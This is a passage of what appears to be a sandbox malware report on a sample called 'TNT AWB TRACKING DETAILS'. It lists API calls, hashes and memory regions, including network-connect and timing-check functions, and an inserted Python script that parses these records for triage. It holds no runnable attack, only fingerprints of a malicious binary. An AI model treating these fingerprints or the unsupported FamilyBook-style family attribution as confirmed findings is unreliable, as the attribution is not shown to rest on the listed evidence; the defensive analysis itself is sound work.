                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                      • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                      • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                      • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00445879
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                      • _wcslen.LIBCMT ref: 004458FB
                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                      • String ID:
                                      • API String ID: 3087257052-0
                                      • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                      • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                      • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                      • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                      APIs
                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                      • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 245547762-0
                                      • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                      • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                      • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                      • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 004471D8
                                      • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                      • SelectObject.GDI32(?,00000000), ref: 00447228
                                      • BeginPath.GDI32(?), ref: 0044723D
                                      • SelectObject.GDI32(?,00000000), ref: 00447266
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Object$Select$BeginCreateDeletePath
                                      • String ID:
                                      • API String ID: 2338827641-0
                                      • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                      • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                      • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                      • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 00434598
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                      • Sleep.KERNEL32(00000000), ref: 004345D4
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                      • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                      • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                      • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
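The two records above that matter most for triage are the Winsock one (socket/connect/closesocket with WSAGetLastError) and this Sleep/QueryPerformanceCounter pair, which is the pattern behind the report's "execution timing, often used to detect debuggers" signature. The following is an added example, not Joe Sandbox code and not part of the sample: a small parser for the "APIs" and "Similarity" listing format used on this page, plus two triage checks run over records copied from the report. It assumes the line shapes exactly as printed here (direct calls, `_wcslen.LIBCMT ref:` calls without arguments, and `Part of subcall function` lines), decodes the `socket()` constants using the Windows SDK values (AF_INET = 2, SOCK_STREAM = 1, IPPROTO_TCP = 6), and does not reimplement the report's own "API ID" or fuzzy-hash computations.

```python
"""Added example (not Joe Sandbox code): parse the function records above into
structured data and flag two triage patterns, Sleep paired with a high-resolution
timer (execution-timing check) and a direct Winsock socket()+connect()."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# One API line, in the three shapes that occur on this page:
#   • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
#   • _wcslen.LIBCMT ref: 004458FB
#   • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # "• Key: value"
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]        # raw argument tokens as printed; '?' = unresolved
    ref: int               # call-site address
    subcall: int | None    # callee address when listed as 'Part of subcall'

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)   # API ID, fuzzy hashes, ...

    def api_names(self) -> set[str]:
        return {a.name for a in self.apis}

def parse_records(text: str) -> list[FunctionRecord]:
    """A function without API calls has no 'APIs' header, so the 'Instruction
    Fuzzy Hash' line that closes every record is used as the boundary."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        if m := API_LINE.match(line):
            args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                    int(m["sub"], 16) if m["sub"] else None))
        elif f := FIELD_LINE.match(line):
            cur.fields[f["key"]] = f["val"].strip()
            if f["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    return records

# Winsock constants for socket(af, type, protocol), values from the Windows SDK.
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
TIMING_APIS = {"QueryPerformanceCounter", "GetTickCount", "GetTickCount64", "timeGetTime"}

def decode_socket_call(call: ApiCall) -> str:
    """Name the first three socket() arguments, or 'unresolved' if any is '?'."""
    if call.name != "socket" or len(call.args) < 3 or not all(HEX8.fullmatch(a) for a in call.args[:3]):
        return "unresolved"
    af, typ, proto = (int(a, 16) for a in call.args[:3])
    return f"{AF.get(af, af)}/{SOCK_TYPE.get(typ, typ)}/{PROTO.get(proto, proto)}"

def flag(record: FunctionRecord) -> list[str]:
    """Triage findings for one function as short strings (empty if nothing matched)."""
    names, out = record.api_names(), []
    if "Sleep" in names and (timers := names & TIMING_APIS):
        out.append("execution-timing check (" + ", ".join(sorted(timers)) + " around Sleep)")
    direct = [a for a in record.apis if a.name == "socket" and a.subcall is None]
    if direct and "connect" in names:
        out.append("outbound connect: " + decode_socket_call(direct[0]))
    return out

# Two records copied from the report above (Memory Dump Source lines omitted).
SAMPLE = """APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
• API ID: CounterPerformanceQuerySleep
• Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("API ID", "<no APIs>"), "->", flag(rec) or ["nothing flagged"])
```

Feed the whole text export of this section to `parse_records` and the `Instruction Fuzzy Hash` values become a per-function key you can compare against other FormBook or AutoIt-packed samples; the `subcall` field keeps calls that the report attributes to a callee (such as the `inet_addr` line) from being counted as the function's own direct calls, which is why `flag` only considers a `socket()` call with `subcall is None`.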
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                      • MessageBeep.USER32(00000000), ref: 00460C46
                                      • KillTimer.USER32(?,0000040A), ref: 00460C68
                                      • EndDialog.USER32(?,00000001), ref: 00460C83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                      • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                      • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                      • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$Icon
                                      • String ID:
                                      • API String ID: 4023252218-0
                                      • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                      • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                      • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                      • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                      APIs
                                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                                      • String ID:
                                      • API String ID: 1489400265-0
                                      • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                      • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                      • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                      • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                      APIs
                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                      • DestroyWindow.USER32(?), ref: 00455728
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                      • String ID:
                                      • API String ID: 1042038666-0
                                      • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                      • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                      • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                      • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                      APIs
                                      • __getptd.LIBCMT ref: 0041780F
                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                      • __getptd.LIBCMT ref: 00417826
                                      • __amsg_exit.LIBCMT ref: 00417834
                                      • __lock.LIBCMT ref: 00417844
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                      • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                      • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                      • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                      APIs
                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                      • ExitThread.KERNEL32 ref: 004151ED
                                      • __freefls@4.LIBCMT ref: 00415209
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                      • String ID:
                                      • API String ID: 4247068974-0
                                      • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                      • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                      • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                      • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: )$U$\
                                      • API String ID: 0-3705770531
                                      • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                      • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                      • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                      • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                      APIs
                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                      • CoInitialize.OLE32(00000000), ref: 0046E505
                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                      • CoUninitialize.OLE32 ref: 0046E53D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 886957087-24824748
                                      • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                      • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                      • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                      • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                      • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                      • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                      • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                      • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                      • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                      • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                      • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                      • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                      • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                      Strings
                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
